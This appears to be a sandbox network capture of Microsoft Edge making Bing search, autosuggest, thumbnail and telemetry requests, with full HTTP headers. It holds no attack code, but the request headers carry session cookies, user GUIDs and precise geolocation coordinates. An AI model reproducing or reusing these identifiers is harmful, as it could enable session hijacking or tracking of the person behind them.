accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-xKUzdLpFDb1cU2r7tEAGyzM06GvIZCw85lP0BDeud+0='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:56 GMT
set-cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306936.7f1cbde
GET

https://www.bing.com/th?id=OSK.11014e0765e9a4f0689f2c62e5ca1b80&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.11014e0765e9a4f0689f2c62e5ca1b80&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:56 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306936.7f1cd06
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=&cp=0&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=&cp=0&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 976
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 1476
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a382cdd4f118331ef8ef4fe0455
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-5NON/jjGfcDAkBel+edp3YIdWIgbdu+qriHX4+nTC0I='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:56 GMT
set-cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306936.7f1ccff
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=d&cp=1&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=d&cp=1&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2646
date: Wed, 04 Dec 2024 10:08:56 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306936.7f1cd71
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Ar%2Ci%3A1%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306926381%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ar%2Ci%3A1%22%2C%22AsResponseLength%22%3A%221778%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306926464%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ar%2Ci%3A1%2Cig%3AD1814F619C88487C96E2DAEED0C3E754%22%2C%22AnswerInfo%22%3A%22MB%3B6%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306926464%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ar%2Ci%3A1%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306926469%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A1%2C%20%5C%22GL%5C%22%3A5%2C%20%5C%22IG%5C%22%3A%5C%22D1814F619C88487C96E2DAEED0C3E754%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306926469%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A2%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306926965%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A2%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306926998%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A2%22%2C%22AsResponseLength%22%3A%22762%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306927105%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A2%2Cig%3A07EB357199DC411687BECD6CB9445273%22%2C%22AnswerInfo%22%3A%22HS%3B5%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306927105%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ad%2Ci%3A3%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306927179%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Ar%2Ci%3A1%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306926381%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ar%2Ci%3A1%22%2C%22AsResponseLength%22%3A%221778%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306926464%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ar%2Ci%3A1%2Cig%3AD1814F619C88487C96E2DAEED0C3E754%22%2C%22AnswerInfo%22%3A%22MB%3B6%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306926464%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ar%2Ci%3A1%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306926469%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A1%2C%20%5C%22GL%5C%22%3A5%2C%20%5C%22IG%5C%22%3A%5C%22D1814F619C88487C96E2DAEED0C3E754%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306926469%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A2%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306926965%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A2%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306926998%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A2%22%2C%22AsResponseLength%22%3A%22762%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306927105%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A2%2Cig%3A07EB357199DC411687BECD6CB9445273%22%2C%22AnswerInfo%22%3A%22HS%3B5%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306927105%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ad%2Ci%3A3%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306927179%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2658
date: Wed, 04 Dec 2024 10:08:56 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306936.7f1cd77
GET

https://www.bing.com/th?id=OSK.dvHHWJdGoGdGFChkeYSPHtliDKa1VaPsE9QLAy2I7eY&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.dvHHWJdGoGdGFChkeYSPHtliDKa1VaPsE9QLAy2I7eY&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
